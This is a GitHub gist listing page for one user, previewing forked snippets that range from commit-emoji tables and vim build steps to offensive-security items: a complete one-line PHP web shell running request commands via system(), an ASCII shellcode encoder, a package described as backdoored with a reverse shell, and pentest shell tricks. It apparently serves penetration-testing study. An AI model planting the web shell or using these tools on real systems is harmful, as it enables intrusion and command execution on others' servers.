Skip to content

Instantly share code, notes, and snippets.

Avatar

Kevin Kirsche kkirsche

View GitHub Profile
@kkirsche
kkirsche / ConventionalCommitsEmoji.md
Last active Jun 17, 2021 — forked from parmentf/ConventionalCommitsEmoji.md
Emoji for Conventional Commits
View ConventionalCommitsEmoji.md
Type Emoji code
build 📦 :package:
chore 🔧 :wrench:
ci 👷 :construction_worker:
docs 📚 :books:
feat :sparkles:
fix 🐛 :bug:
perf 🚀 :rocket:
refactor 🔨 :hammer:
@kkirsche
kkirsche / ascii-shellcode-encoder.py
Created Oct 2, 2018 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
View ascii-shellcode-encoder.py
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving
@kkirsche
kkirsche / vim8.x_with_lua
Created Jul 28, 2018 — forked from techgaun/vim8.x_with_lua
Install vim with lua support on ubuntu 16.04
View vim8.x_with_lua
I needed to install vim with lua support because I wanted to use neocomplete in my recently installed 15.04 distro. Also, this has python3 enabled by default.
Tested on 16.04 now
Update: This has been tested and verified to work on Ubuntu 16.04 as well. Also, if you wish to use particular branch/tag, you can get the version and then checkout appropriately.
The following (based upon https://gist.github.com/jdewit/9818870) should work though I copied it from history:
sudo apt-get remove --purge vim vim-runtime vim-gnome vim-tiny vim-common vim-gui-common
sudo apt-get build-dep vim-gnome
sudo apt-get install build-essential liblua5.3-0 liblua5.3-dev python-dev ruby-dev libperl-dev libncurses5-dev libgnome2-dev libgnomeui-dev libgtk2.0-dev libatk1.0-dev libbonoboui2-dev libcairo2-dev libx11-dev libxpm-dev libxt-dev
@kkirsche
kkirsche / dumprequest.php
Created Mar 6, 2018 — forked from magnetikonline/dumprequest.php
PHP script to dump full HTTP request to file (method, HTTP headers and body).
View dumprequest.php
<?php
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40
class DumpHTTPRequestToFile {
public function execute($targetFile) {
$data = sprintf(
"%s %s %s\n\nHTTP headers:\n",
$_SERVER['REQUEST_METHOD'],
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Escalate
  5. Document it

Time yourself

View Simple-Backdoor-One-Liner.php
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
@kkirsche
kkirsche / MyPackage.opm
Created Nov 15, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
View MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
@kkirsche
kkirsche / tricks
Created Nov 10, 2017 — forked from sckalath/tricks
tricks
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
@kkirsche
kkirsche / go-ssh-reverse-tunnel.go
Created Oct 25, 2017 — forked from codref/go-ssh-reverse-tunnel.go
Go SSH reverse tunnel implementation (SSH -R)
View go-ssh-reverse-tunnel.go
/*
Go-Language implementation of an SSH Reverse Tunnel, the equivalent of below SSH command:
ssh -R 8080:127.0.0.1:8080 operatore@146.148.22.123
which opens a tunnel between the two endpoints and permit to exchange information on this direction:
server:8080 -----> client:8080
@kkirsche
kkirsche / add CA cert on CentOS.md
Created Aug 2, 2017 — forked from kekru/add CA cert on CentOS Debian Ubuntu.md
Add CA cert to local trust store on CentOS or Debian
View add CA cert on CentOS.md
  • Open a webpage that uses the CA with Firefox
  • Click the lock-icon in the addressbar -> show information -> show certificate
  • the certificate viewer will open
  • click details and choose the certificate of the certificate-chain, you want to import to CentOS
  • click "Export..." and save it as .crt file
  • Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
  • run update-ca-trust extract
  • test it with wget https://thewebsite.org